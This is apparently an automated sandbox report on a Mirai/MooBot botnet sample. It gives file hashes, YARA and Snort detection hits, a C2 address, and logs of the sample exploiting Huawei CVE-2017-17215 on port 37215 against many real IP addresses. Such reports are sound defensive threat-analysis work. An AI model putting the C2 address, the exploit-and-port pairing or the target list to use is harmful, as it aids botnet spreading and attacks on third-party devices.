Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
skyljnee.x86_64-20240128-0910.elf

Overview

General Information

Sample name:skyljnee.x86_64-20240128-0910.elf
Analysis ID:1382264
MD5:009e0d9bc08d5d1eccff25abb2c22b62
SHA1:23129c88b1e9aa8a936b4005dbcbb6fca36d35c3
SHA256:a56069629de9745d155df5ea91ca8813c56f3861c5cd88aa1eda49f21c3981eb
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1382264
Start date and time:2024-01-28 10:15:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 21s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:skyljnee.x86_64-20240128-0910.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@1/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/skyljnee.x86_64-20240128-0910.elf
PID:6233
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 6241, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 6241, Parent: 1477, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
skyljnee.x86_64-20240128-0910.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    skyljnee.x86_64-20240128-0910.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      skyljnee.x86_64-20240128-0910.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x193a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x193bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x193d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x193e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x193f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1940c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19420:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19434:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19448:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1945c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19470:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19484:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19498:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19510:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19524:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19538:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      skyljnee.x86_64-20240128-0910.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xfed0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      skyljnee.x86_64-20240128-0910.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0x1069f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      Click to see the 12 entries
      SourceRuleDescriptionAuthorStrings
      6233.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        6233.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6233.1.0000000000400000.000000000041d000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x193a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1940c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19420:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19434:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19448:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1945c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19470:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19484:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19498:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19510:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19524:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19538:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6233.1.0000000000400000.000000000041d000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0xfed0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          6233.1.0000000000400000.000000000041d000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0x1069f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          Click to see the 14 entries
          Timestamp:192.168.2.2386.69.7.16359702372152829579 01/28/24-10:17:51.020493
          SID:2829579
          Source Port:59702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2386.69.7.16359702372152835222 01/28/24-10:17:51.020493
          SID:2835222
          Source Port:59702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2343.246.209.18934594372152829579 01/28/24-10:16:45.061391
          SID:2829579
          Source Port:34594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.34.134.2159068372152829579 01/28/24-10:17:14.548886
          SID:2829579
          Source Port:59068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2343.246.209.18934594372152835222 01/28/24-10:16:45.061391
          SID:2835222
          Source Port:34594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.34.134.2159068372152835222 01/28/24-10:17:14.548886
          SID:2835222
          Source Port:59068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.14636396199902030490 01/28/24-10:15:51.914808
          SID:2030490
          Source Port:36396
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:103.245.236.146192.168.2.2319990363962030489 01/28/24-10:15:52.249260
          SID:2030489
          Source Port:19990
          Destination Port:36396
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: skyljnee.x86_64-20240128-0910.elfAvira: detected
          Source: skyljnee.x86_64-20240128-0910.elfVirustotal: Detection: 42%Perma Link
          Source: skyljnee.x86_64-20240128-0910.elfReversingLabs: Detection: 60%
          Source: skyljnee.x86_64-20240128-0910.elfJoe Sandbox ML: detected
          Source: skyljnee.x86_64-20240128-0910.elfString: wgetcurlechocatnano/proc/proc/%d/cmdlineabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f

          Networking

          barindex
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:36396 -> 103.245.236.146:19990
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.245.236.146:19990 -> 192.168.2.23:36396
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34594 -> 43.246.209.189:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34594 -> 43.246.209.189:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59068 -> 41.34.134.21:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59068 -> 41.34.134.21:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59702 -> 86.69.7.163:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59702 -> 86.69.7.163:37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59068 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59068 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59068
          Source: unknownNetwork traffic detected: HTTP traffic on port 34594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59702 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59702 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59702 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59702 -> 37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.210.36.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 47.153.225.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.174.119.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.137.233.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.237.31.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 181.84.148.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.137.14.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 12.5.240.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.228.224.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 31.226.201.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.251.216.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.118.204.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.234.36.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 104.138.231.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 181.22.7.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 81.171.135.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.240.164.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.251.63.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 102.157.253.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.6.122.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.44.226.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.255.40.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 134.162.52.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 69.248.105.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.238.162.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.86.55.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.227.219.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.69.247.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 126.22.87.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 196.167.4.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.20.50.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.237.18.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 67.187.236.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.110.102.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 99.193.215.124:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 198.138.60.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.150.39.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.65.10.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.76.177.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.66.38.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.157.227.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.69.116.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.97.64.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.88.253.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.73.209.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.139.59.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.176.201.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 43.186.125.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.156.100.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.218.199.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.152.9.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 168.67.246.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.9.123.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.231.177.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.237.50.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.228.228.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.181.73.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.234.106.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 140.235.249.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 142.238.183.143:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.78.15.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 20.79.176.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 147.160.255.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.96.223.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.146.95.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.163.58.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.7.236.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 145.82.210.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 98.118.210.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.143.201.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.121.151.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.88.107.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 32.111.97.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.142.40.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.184.90.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.119.205.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 80.16.225.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 155.144.145.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.27.184.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.165.107.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.0.6.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 221.154.247.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.193.91.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.103.191.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.186.133.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.87.52.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.0.5.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.244.55.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.129.61.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.114.96.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.218.252.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.182.237.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.41.135.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.61.122.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.22.223.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.147.176.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.143.209.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.156.181.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 50.38.213.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 134.133.15.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.237.210.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.241.8.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.136.13.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.192.141.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.133.50.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.147.162.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.53.251.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.217.174.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.193.104.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 72.128.123.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.16.60.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 175.151.200.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 60.116.226.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.128.32.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.226.227.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.195.118.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.135.8.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 195.111.101.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.129.207.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.163.65.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 122.3.140.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.120.238.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 100.24.54.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.4.174.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.159.156.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 210.123.157.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.79.94.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.75.198.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 183.75.4.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 130.228.97.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 60.124.41.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.202.15.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 97.53.210.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.166.164.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.123.163.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.160.235.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 220.35.136.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.0.183.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.242.14.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.36.136.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 154.66.115.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.195.208.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.228.146.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.29.60.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.5.172.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.113.105.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.175.13.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.135.159.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.168.164.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 122.107.21.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 49.164.254.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.244.98.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.178.221.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.202.114.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.122.240.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.183.144.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.98.232.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.170.35.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.31.84.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.211.20.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.250.164.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.31.43.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.64.221.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.248.132.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.0.82.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.253.19.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.134.135.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.187.173.197:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.63.17.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.135.58.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.89.202.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 223.192.103.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.80.178.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.133.143.98:37215
